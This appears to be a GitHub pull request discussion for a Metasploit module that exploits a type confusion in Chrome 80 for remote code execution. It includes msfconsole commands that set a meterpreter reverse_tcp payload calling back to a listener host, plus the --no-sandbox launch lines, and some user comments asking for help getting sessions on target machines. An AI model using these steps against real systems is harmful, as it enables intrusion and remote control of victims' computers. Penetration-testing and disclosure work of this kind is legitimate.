Google Chrome 80 JSCreate side-effect type confusion exploit #13008

timwr · 2020-02-29T10:59:51Z

Tested on Windows 10 running Google Chrome (64bit) 80.0.3987.87 (e.g https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
Thankfully(!) there is no sandbox escape, so you'll need to run Chrome with --no-sandbox

Verification

List the steps needed to make sure this thing works

Start msfconsole
Run the exploit:

use exploit/multi/browser/chrome_jscreate_sideeffect
set SRVHOST 192.168.56.1
set URIPATH /
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.1
run

Verify you get a meterpreter session

modules/exploits/multi/browser/chrome_jscreate_sideeffect.rb

agalway-r7

Tested and working as expected, good work! Few QOL changes, add docs, and its good to go 👍

Co-Authored-By: adamgalway-r7 <54621924+adamgalway-r7@users.noreply.github.com>

timwr · 2020-03-04T05:32:33Z

So this does work identically on OSX for the same version (https://dl.google.com/release2/chrome/AJkrrB9igve6Mz4STD5utjA_80.0.3987.87/GoogleChrome-80.0.3987.87.dmg)
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --no-sandbox).
You'll need an OSX payload, e.g:
set payload osx/x64/meterpreter/reverse_tcp

timwr · 2020-03-04T05:36:52Z

Linux will presumably also work identically, as well as 64bit Chrome Android (Google Chrome Dev).
Supporting 32bit requires re-writing the exploit (ping @AmesianX) but that would add support for 32bit (or WOW64) Windows, as well as the stable (default) version on Android.

agalway-r7 · 2020-03-04T14:54:37Z

Release Notes

Adds an exploit module for Google Chrome 80. Module starts webpage hosting malicious JavaScript that when visited by a vulnerable version of Chrome allows Remote Code Execution on a remote machine. Currently only possible with --no-sandbox Chrome flag in use.

Vikec · 2020-03-14T08:53:25Z

Why not run on Chrome 79

bcoles · 2020-03-14T09:22:46Z

Why not run on Chrome 79

This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The browser must be run with the --no-sandbox option for the payload to work correctly.

NereaCabiedasMoreno · 2020-10-06T23:01:43Z

yo estoy probando y me aparece el error de : exploit completed but no session was created
no me crea la sesión, ataco a una maquina con windows 10 y el Google Chrome 80.0.3987.87 y uso PAYLOAD windows/x64/meterpreter/reverse_tcp

timwr · 2020-10-07T08:04:38Z

@Nereaaaa ¿Ejecutaste Chrome con el argumento --no-sandbox?

NereaCabiedasMoreno · 2020-10-07T09:00:15Z

podrías decirme como debo probar eso , por favor

timwr · 2020-10-07T09:47:00Z

Did you read the documentation?
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox

NereaCabiedasMoreno · 2020-10-07T09:50:44Z

vale , muchas gracias

NereaCabiedasMoreno · 2020-10-16T09:11:00Z

Estoy intentando probarlo con Linux y no consigo realizar el ataque , utilizo chromium 80.0.0.3987.0 , no se quitar el sandbox y no encuentro otra versión , ¿alguien podría ayudarme?, gracias

chrome 80 jscreate rce

196c354

timwr added the needs-docs label Feb 29, 2020

agalway-r7 self-assigned this Mar 3, 2020